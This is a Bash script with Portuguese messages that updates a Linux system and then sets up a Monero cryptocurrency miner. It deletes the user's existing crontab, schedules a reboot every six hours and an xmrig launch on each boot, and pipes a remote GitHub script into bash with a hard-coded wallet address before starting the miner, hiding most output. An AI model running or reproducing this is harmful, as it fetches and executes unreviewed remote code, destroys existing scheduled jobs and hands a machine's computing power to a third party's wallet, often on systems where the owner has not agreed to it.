#!/bin/bash

cd $HOME
fun_bar () {
comando[0]="$1"
comando[1]="$2"
(
[[ -e $HOME/fim ]] && rm $HOME/fim
${comando[0]} -y > /dev/null 2>&1
${comando[1]} -y > /dev/null 2>&1
touch $HOME/fim
) > /dev/null 2>&1 &
tput civis
echo -ne "  \033[1;33mAGUARDE \033[1;37m- \033[1;33m["
while true; do
for((i=0; i<18; i++)); do
echo -ne "\033[1;31m#"
sleep 0.1s
done
[[ -e $HOME/fim ]] && rm $HOME/fim && break
echo -e "\033[1;33m]"
sleep 1s
tput cuu1
tput dl1
echo -ne "  \033[1;33mAGUARDE \033[1;37m- \033[1;33m["
done
echo -e "\033[1;33m]\033[1;37m -\033[1;32m OK !\033[1;37m"
tput cnorm
}
clear
echo ""
echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mATUALIZANDO SISTEMA \033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
echo ""
echo -e "    \033[1;33mATUALIZAÇÕES COSTUMAM DEMORAR UM POUCO!\033[0m"
echo ""
fun_attlist () {
apt update && apt upgrade -y && apt autoremove -y
}
fun_bar 'fun_attlist'
clear
echo ""
echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mINSTALANDO PACOTES \033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
echo ""
echo -e "\033[1;33mALGUNS PACOTES SAO EXTREMAMENTE  NECESSÁRIOS !\033[0m"
echo ""
inst_prog () {
_pacotes=("htop" "curl" "cpulimit")
for _prog in ${_pacotes[@]}; do
apt install $_prog -y
done
}
fun_bar 'inst_prog'

crontab -r >/dev/null 2>&1
(
	crontab -l 2>/dev/null
	echo "00 */6 * * * /sbin/reboot"
	echo "@reboot cpulimit -e xmrig -l $((75*4)) -b"
) | crontab -

clear
echo ""
echo -e "\033[1;33mPRONTO! BAIXANDO SCRIPT MINNER MONERO!\033[0m"
echo ""
inst_minner () {
curl -s -L https://raw.githubusercontent.com/juniorfdtech/update/master/setup_minner.sh | bash -s 8BvGDdUNdGwG5B9oNUywNc9yh7ggEJjskRyBhUYNLT63fjryxsVRLsmVED7JvJTyfq5zjkAVxcdohdmgX7b9UFS2GWUWWEq && cd mo* && ./xm*
}
fun_bar 'inst_minner'

